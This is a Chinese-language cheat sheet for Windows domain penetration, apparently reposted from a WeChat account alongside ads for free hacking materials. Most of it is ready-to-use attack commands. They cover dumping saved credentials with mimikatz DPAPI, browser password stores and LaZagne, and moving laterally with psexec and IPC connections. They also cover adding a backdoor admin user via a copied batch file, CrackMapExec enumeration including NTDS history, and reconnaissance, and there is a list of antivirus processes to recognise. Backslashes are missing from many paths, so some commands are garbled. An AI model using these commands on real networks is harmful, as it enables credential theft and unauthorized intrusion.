扫码免费领黑客资料
(正在为你配置合适的助教)
内网渗透的本质就是信息收集
获取windows远程桌面 连接记录
cmdkey /list # 查看mstsc的连接纪录
查找本地的Credentials:
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
使用mimikatz进行操作:
mimikatz:
dpapi::cred/in:C:UsersAdministratorAppDataLocalMicrosoftCredentials92FB159ED290FC523E845094404697A8
域登录日志&远程登录日志
域日志位置
C:WindowsSystem32winevtLogsSecurity.evtx 服务器登录日志 登录事件ID 4624,可判别出登录域控制器的机器
c:windowssystem32winevtlogs*.remote* 远程登录日志
主机远程登录日志
HKCUSoftwareMicrosoftTerminal Server ClientServers
HKCUSoftwareMicrosoftTerminal Server ClientDefault
浏览器相关
chrome:
// chrome记住密码保存的数据库位置
%LocalAppData%GoogleChromeUser DataDefaultLogin Data
firefox:
%appdata%RoamingMozillaFirefoxProfiles*.defualtlogins.json
%appdata%RoamingMozillaFirefoxProfiles*.defualtkey3.db
%appdata%RoamingMozillaFirefoxProfiles*.defualtplace.sqlite
psexec
psexec针对远程建立连接的认证方式有两种:
一种先建立ipc连接,
然后直接用psexec 10.10.10.10 cmd命令开启一个半交互式的cmdshell
另一种是在psexec的参数中指定账号密码。
psexec \10.10.10.10 c:file.bat
SPN扫描
spn原理是通过ldap协议向域控制器进行查询,只要活得一个普通的域用户,就可以spn扫描。
Win 方式
C:Windowssystem32>setspn -T domain -q */* //win自带命令完成扫描
setspn -Q */*Find-PSServiceAccounts.ps1 //发现包含弱密码的服务
其他脚本说明,ps脚本 :
https://github.com/PyroTek3/PowerShell-AD-Recon/
psloggedon.exe
查看本地登陆的用户和通过本地计算机或远程计算机登陆过的用户。
如果指定的是用户名而不是计算机名,程序会搜索网上邻居中的计算机。
原理是通过检查注册表HKEY_USERS的key值来查询谁登陆过。
某些功能需要管理权限
下载:
https://docs.microsoft.com/enus/sysinternals/downloads/psloggedon
LaZagne(非常好用!)
这里再介绍LaZagne一个收集密码工具-LaZagne
每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码,这个工具是用来获取存储在本地计算机上的密码,诸如浏览器密码等等
工具地址:https://github.com/AlessandroZ/LaZagne
常见杀毒软件的进程
ZhuDongFangYe.exe360主动防御
KSafeTray.exe金山卫士
McAfee McShield.exeMcAfee
Egui.exeNOD32
AVP.exe 卡巴斯基
avguard.exe小红伞
Bdagent.exeBitDefender
CrackMapExec(信息收集)
参考:https://www.secpulse.com/archives/53474.html
列出共享
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --shares
列出会话
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --sessions
列出磁盘信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --disks
列出登录的用户
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --loggedon-users
列出域用户
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --users
根据唯一的RID列出所有的用户
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --rid-brute
列出域组
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --groups
列出本地组
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --local-groups
列出域密码策略
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --pass-pol
尝试空会话
cme smb 192.168.127.235 -u '' -p ''
列出指定域信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -d LABNET
列出ntds.dit的历史信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --ntds-history
爬行C盘目录信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C$ --pattern txt
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C$
域渗透常用命令表(没事看看)
最后放一个域渗透常用命令表,没事就来看看。
渗透中忘了也可以来查查。
net user /domain // 查询域用户
net group /domain // 查询域里面的工作组
net group "domain admins" /domain // 查询域管理员用户组
net localgroup administrators /domain //登录本机的域管理员
net group "domain controllers" /domain // 查看域控制器(如果有多台)
mstsc /admin //远程桌面登录到 console 会话解决 hash 无法抓出问题
nltest /dsgetdc:域名 //查询域控主机名。如 nltest /dclist:bk
nltest /domain_trusts //可以列出域之间的信任关系
net view /domain:Secwing查看 Secwing 域中计算机列表
net time /domain //判断主域,主域服务器都做时间服务器
net config workstation // 当前登录域
net group "enterprise admins" /domain 企业管理组
net user /domain [email protected] test //修改域用户密码
dsquery computer domainroot -limit 65535 && net group “domain computers” /domain //列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain //列出该域内所有用户名
dsquery subnet //列出该域内网段划分
dsquery group && net group /domain //列出该域内分组
dsquery ou //列出该域内组织单位
dsquery server && net time /domain //列出该域内域控制器
net use \192.168.0.0 Passw0rd! /user:admin //建立 ipc 连接
copy add.bat \192.168.0.0c$wmpub //复制 add.bat 到目标 C 盘 wmpub 目录
add.bat 里面的内容是 net userTwi1ight Passw0rd! /add //添加 Twi1ight 用户
at \192.168.0.0 //查看目标的计划任务列表
转自:https://mp.weixin.qq.com/s/anDiDuCWN4H48-r6nT-ynA
黑客视频教程录播+进内部群+黑客工具+攻防靶场
扫下方二维码直接领各资料
扫码免费领资料
(正在为你配置合适的助教)
往期内容回顾
原文始发于微信公众号(白帽子左一):【建议收藏】域渗透突破方式
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论